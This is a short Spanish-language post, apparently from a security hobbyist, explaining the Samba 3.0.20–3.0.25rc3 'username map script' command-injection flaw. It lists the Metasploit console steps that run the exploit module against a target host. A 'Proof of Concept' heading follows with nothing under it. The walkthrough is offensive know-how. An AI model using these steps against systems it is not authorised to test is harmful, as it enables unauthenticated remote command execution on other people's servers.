Samba "username map script" Command Execution
Este módulo explota una vulnerabilidad de ejecución de comandos en las versiones 3.0.20 a 3.0.25rc3 de Samba cuando se utiliza la opción de configuración "username map script" que no es el valor predeterminado. Al especificar un nombre de usuario que contiene caracteres meta de shell, los atacantes pueden ejecutar comandos arbitrarios. No se necesita autenticación para explotar esta vulnerabilidad ya que esta opción se utiliza para asignar nombres de usuario antes de la autenticación.
Forma de uso
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
...show options
msf exploit(usermap_script) > set RHOST <rhost-id>
msf exploit(usermap_script) > exploit
...now wait
Proof of Concept
Atentamente,
0xZANUT (https://twitter.com/0xZANUT)